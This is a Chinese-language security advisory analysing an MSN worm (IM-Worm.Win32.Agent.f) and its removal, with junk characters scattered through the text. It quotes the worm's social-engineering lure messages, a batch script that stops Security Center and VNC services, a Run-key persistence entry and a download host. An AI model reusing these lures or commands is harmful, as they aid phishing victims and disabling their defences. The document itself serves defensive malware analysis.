文件名称: IMG34814.pif
计算机安全资讯文件大小: 40960 Bytes
MD5: FC5415DC9054EE0934E3FF3E587DE444
计算机安全资讯!G-S:]6P4R9A-v加壳: N/A
2J$q#b(X0w-B%n U6a2l病毒名: kaspersky: IM-Worm.Win32
.Agent.f
www.vaid.cn4r'x(V;v*D0P&I5[$[病毒特征:感染后的电脑会自动通过msn,向所有msn联系人发送一个名为image.zip的压缩包
1l @9v*C#u同时发送消息
LOL, you look so ugly in this picture, no joke...1E"e.}7w*z%])t'n/x
Should I put this on facebook/myspace?/R)d*c2Q1A#M
或者
计算机安全资讯(R1o,j"Q*R
Hey m8, who is this on the right, in this picture...1Y5]4`#t4{
Sup, seen the pictures from the other night?
来欺骗接受者打开压缩包
当接受者打开压缩包并运行病毒程序便会感染!
计算机安全资讯4`)e7h3K.z0v0s0]0v-E9SF)L._1q,`6b$n病毒分析:
www.vaid.cn*b)p6Y5j0N运行样本后会在系统盘下创建a.bat
计算机安全资讯-U/z/e w7o,\!~内容为
@echo off
net stop "Security Center"
net stop winvnc4
del c:\a.bat
然后创建文件
#V8X9\4I"@/[3u%WINDOWS%winlog32.exe
创建自启动项
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MSN: "winlog32.exe"
尝试连接:down.basecore.info
清除步骤:
1:删除启动项目
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MSN: "winlog32.exe"
2:重新启动计算机
|#N#e(?3:删除病毒文件
您的位置: